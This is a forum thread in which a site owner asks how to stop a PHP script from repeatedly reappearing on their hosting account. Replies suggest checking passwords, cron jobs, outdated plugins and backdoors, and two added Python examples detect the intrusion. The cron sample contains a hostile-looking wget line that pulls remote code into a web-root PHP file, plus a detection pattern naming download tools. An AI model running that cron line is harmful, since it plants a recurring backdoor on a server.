
Some fucker keeps uploading a php script to my hosting account what to do?

Discussion in 'Black Hat SEO Tools' started by I wear slippers, Nov 19, 2015.

  1. I wear slippers

    I had kept getting resource overload messages and so I was slowly going through clearing out old domains. While I was doing so I noticed some php script in the home directory. I had no idea what it was. I checked my entry processes at the time and they were high and as soon as I deleted this php file they went back to 0.

    So I hadn't been having any issues with resource emails from my provider since then for 4 or 5 days but today I looked in my email and there was another message. So I look in the home folder and lo and behold yet another rogue php script and entry processes running high.

    Now I didn't change my password last time but this time I deleted the script and also changed my password.

    Will this be enough or do I have to take more measures? If so, what?
     
  2. MoneyEagle

    Changing password seems the only possible solution. Also try contacting your hosting / vps service provider about this issue.
     
  3. HoNeYBiRD

    Well, it can be quite a few things.

    The least possible scenario is that someone bruteforced your acc; more possible is a keylogger on your system. Or there was a breach on 000webhost not too long ago, where 13 million user accounts were compromised. Even if it's not the hosting provider you're talking about, it can be that someone is playing smart and trying the same username:password combo on other hosting providers as well, so if you have an acc with 000webhost and are re-using the same username:password on other sites, that can be an explanation too. Changing your password in that case is enough, but if the rogue php script still gets uploaded after you changed your password, then you have a keylogger, which you need to remove. In that case, just to be sure, change your password from a different machine (which is not on the same network).
     
  4. Conor

    Check your cron jobs.

    I recently worked on a site with a cron job that kept recreating an infected file on the server.
     
  5. whiteroot

    if after changing your password, you still have the script created, it can be an exploit against your software, whatever it is (wordpress, joomla, prestashop...)
    is it up-to-date ?
    it may come from a plugin too - are they up-to-date ?
    bought/downloaded from a safe place ? if not, remove the suspicious one
    check the apache log to find a suspicious request (ask your hosting comp if you don't have them)
    but whatever you decide, tell them about this, they may help
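
One way to do the Apache log check suggested in the post above, as an added example that is not part of the thread: given the rogue file's URL path, it lists successful POSTs made by the same client before that client first requested the file, which is where an upload hole usually shows up. The log lines, plugin path and file name `/x7.php` are constructed, and the rogue file is assumed to be reachable under the web root.

```python
import re
from datetime import datetime

# Constructed sample in Apache "combined" format (not taken from the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [19/Nov/2015:02:11:05 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [19/Nov/2015:02:14:40 +0000] "POST /wp-content/plugins/example-slider/upload.php HTTP/1.1" 200 31 "-" "python-requests/2.8"
198.51.100.23 - - [19/Nov/2015:02:14:42 +0000] "GET /x7.php HTTP/1.1" 200 12 "-" "python-requests/2.8"
198.51.100.23 - - [19/Nov/2015:02:14:50 +0000] "POST /x7.php HTTP/1.1" 200 845 "-" "python-requests/2.8"
203.0.113.7 - - [19/Nov/2015:02:20:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse(log_text):
    """Yield (time, ip, method, path, status) for each parseable line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of crashing
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        # Drop the query string so /x7.php?a=1 still matches /x7.php.
        yield ts, m["ip"], m["method"], m["path"].split("?")[0], int(m["status"])

def entry_point_candidates(log_text, rogue_path):
    """Successful POSTs made by a client before it first touched rogue_path."""
    events = sorted(parse(log_text))
    first_hit = {}
    for ts, ip, _method, path, _status in events:
        if path == rogue_path and ip not in first_hit:
            first_hit[ip] = ts
    return [
        (ip, ts.isoformat(), path)
        for ts, ip, method, path, status in events
        if ip in first_hit and ts < first_hit[ip]
        and method == "POST" and 200 <= status < 300
    ]

if __name__ == "__main__":
    for row in entry_point_candidates(SAMPLE_LOG, "/x7.php"):
        print(row)
```

The script or plugin named in the result is the one to update or remove first; a client that rotates IP addresses between the upload and the first hit will not be linked by this check.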
     
  6. Seo Lover

  7. twitter.followers

    Since it has happened with you twice in a row, either you have a keylogger running on your computer. Get a better antivirus to track it down and clean your system.

    OR it could be an issue with your hosting; if, as mentioned above, it is a cheap unreliable one, it's time to switch!
     
  8. MaestroDelWeb

    I had a similar issue. It was on a WordPress based site. My host couldn't figure out the problem. They kept scanning, deleting the file, then the next day or a couple of days later the file would come back. I ended up installing Wordfence, it found some changed WP files, I reverted them back. It also found another spammer file. Then I ran Sucuri scan, it found a JavaScript exploit on one of my pages. I fixed that. Then I ran iThemes security and it had me make some settings changes. After this my site was completely clean. It wasn't a keylogger or virus on my computer or anything.
     
  9. shout

    Had this happening to me recently - it was an exploit taking advantage of a security hole in one of WordPress's outdated plugins - Revolution Slider. It doesn't necessarily mean you are dealing with a bad host, the attacker may just have found some script/site/plugin that you haven't updated and that isn't secure - these kinds of attacks are common. Also, usually just deleting one file doesn't cut it. He probably has left several backdoors so he can continue doing whatever he is doing.
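
A sweep for the two persistence points raised in this thread (a cron job that recreates the file, and additional backdoor files left behind), as an added example that is not part of any post: it lists crontab lines that fetch remote content or touch PHP files, and PHP files changed since a cutoff time. The crontab text, paths and the `placeholder.invalid` host are constructed.

```python
import os
import re
import tempfile
import time

# Constructed crontab text (in practice, the output of `crontab -l`).
SAMPLE_CRONTAB = """\
# constructed sample, not from the thread
0 3 * * * /usr/bin/php /home/user/public_html/wp-cron.php
*/10 * * * * wget -q -O /home/user/public_html/cache.php http://placeholder.invalid/c.txt
30 2 * * 0 /usr/local/bin/backup.sh
"""

# Commands that download or decode content, or that reference a PHP file.
CRON_HINTS = re.compile(r"\b(wget|curl|fetch|base64)\b|\.php\b")

def cron_lines_to_review(crontab_text):
    """Return active (non-comment) crontab lines that match CRON_HINTS."""
    out = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and CRON_HINTS.search(line):
            out.append(line)
    return out

def php_changed_since(root, cutoff_epoch):
    """Return PHP-like files under root modified at or after cutoff_epoch."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".php5")):
                full = os.path.join(dirpath, name)
                if os.lstat(full).st_mtime >= cutoff_epoch:
                    hits.append(os.path.relpath(full, root))
    return sorted(hits)

def demo():
    """Constructed site tree: one week-old file and one freshly written one."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "uploads"))
    old = os.path.join(root, "index.php")
    new = os.path.join(root, "uploads", "cache.php")
    for path in (old, new):
        open(path, "w").close()
    week_ago = time.time() - 7 * 86400
    os.utime(old, (week_ago, week_ago))
    return php_changed_since(root, time.time() - 86400)
```

Modification times can be backdated by whoever wrote the file, so an empty result does not prove the tree is clean; comparing against a known-good copy of the CMS and plugins is the stronger check.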
     
  10. wisdomkid

    Well, since we haven't heard from you after changing the password, I don't know if the attacker might have access to your account anymore.

    BUT if they do, please do check some plugins. They are the most open doors to getting a website attacked.
    Most especially those plugins which are hardly updated.
     
  11. PaperToy

    What I don't get is why you didn't change the password last time when this happened...
     
  12. Asif WILSON Khan

  13. Cnotey

    What is the script doing? Can you copy/paste it here? Might be able to help a little better.
     
  14. I wear slippers

    Thanks for suggestions. I was engrossed in coding which is why I didn't check :). I feel so cool to call myself a coder now. It is like the pornstar or model of the IM world.

    Well I didn't change the password the first time because I wasn't even sure it was someone else's code or just a script I'd forgotten about that was running on its own, but now it reappeared it seems more the former.

    I will look at suggestions properly in the morning.